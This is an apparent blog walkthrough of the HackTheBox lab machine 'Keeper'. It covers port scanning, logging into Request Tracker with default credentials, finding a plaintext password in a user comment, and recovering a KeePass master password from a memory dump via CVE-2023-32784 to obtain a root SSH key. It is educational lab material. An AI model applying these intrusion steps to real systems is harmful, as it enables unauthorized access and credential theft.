Keeper Write-up

When your Danish dessert compromise the entire system

Pr3ach3r

Published in

System Weakness

4 min readApr 11, 2024

HTB Banner: In the center of the image, it reads “Keeper.” Above the machine’s name, there’s a scroll with a drawing of a key inside. The difficulty level of this machine is categorized as easy. — Keeper HTB banner

INTRODUCTION

Keeper is an easy machine on the HackTheBox website. To gain initial access, we need to exploit a vulnerability on the Request Tracker web service. Once we find an SSH user credential, we can access the server and important files that contain the root password. This last step may seem challenging initially, but it will be easier if you are from Europe.

ENUMERATION

First, check the server’s open ports. You can do this by using the Nmap program.

#nmap command
 nmap -sVC -v -Pn -oN keeper-nmap keeper.htb

#nmap response
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s investigate the port 80.

The web page says — “To raise an IT support ticket, please visit tickets.keeper.htb/rt/”. — Redirecting…

This page shows us what to do next. We click on the link to go to the request tracker login page. We quickly find out from Google that the login page has default login details: root : password.

Following the redirection, the webpage displays a login page. The service running is the Request Tracker, and its version is outdated. — Request Tracker login page

On the admin page, we found a message regarding someone else’s keepass. Further investigation revealed our second finding — the user’s login information: lnorgaard : Welcome2023!

The image displays the admin page with the password located in the “comments about the user” section. — Welcome2023!

INITIAL ACCESS

We found out that only ports 22 and 80 are open after our investigation. Then we can check the user credentials for the SSH service, which gives us access on the server side without any need for reverse shells or exploits. This situation indicates an information disclosure vulnerability. Additionally, we can obtain the user flag.

The image displays the contents of the lnogaard user directory, where User.txt is located. — lnogaard user directory

PRIVILEGE ESCALATION

In the lnorgaard home directory we have two important files — KeePassDumpFull.dmp and passcodes.kdbx. We must retrieve and then install the keepass2 program onto our machines.

The image shows the installation process of the Keepass2 program. The command used for this is “sudo apt install keepass2”. — keepass2 installation

We have two files and the keepass2 binary, but we don’t know what to do with them. We did some research online and came across a CVE — CVE-2023–32784, which allows the dumping of the master password from the KeepPassDumpFull file. However, when we attempted to hack the password, the result was incomplete: **dgr*d med fl*de.

NOTE: I spent a long time searching Google and the hackthebox forum until one comment brought me hope again. The main password we need is “rødgrød med fløde” a Danish recipe.

The character ‘ø’ made it impossible to correctly dump the password before, but now we can access the passcodes.kdbx on keepass2 binary just by using this password.

The image displays the command used to open the passcodes.kdbx file: keepass2 passcodes.kdbx -pw: “rødgrød med fløde”. — **“rødgrød med fløde**”

Opening the file, we discovered the information from the PuTTY PPK file for the root user.

The image displays the contents of the kdbx file. — PuTTY-User-Key-File

We can use PuTTY to enter the system or change the PPK to private-openssh key. Then, we can obtain root access through ssh. First, use the puttygen binary to convert the file.

The image demonstrates how to use the Puttygen program to convert the Putty PPK file to a private OpenSSH file. — It’s done! We are ROOT

Now we can obtain our root flag in the root directory.

CONCLUSION

This machine seemed relatively easy initially, but it became more challenging in the final step when the incomplete dump revealed a Danish phrase. This experience provides valuable lessons in misconfiguration, default credentials, and information disclosure. I hope you find this walkthrough enjoyable. If you do, please consider hitting the clapping button and following to stay updated on future posts.

Thank you for reading, and I’ll see you soon.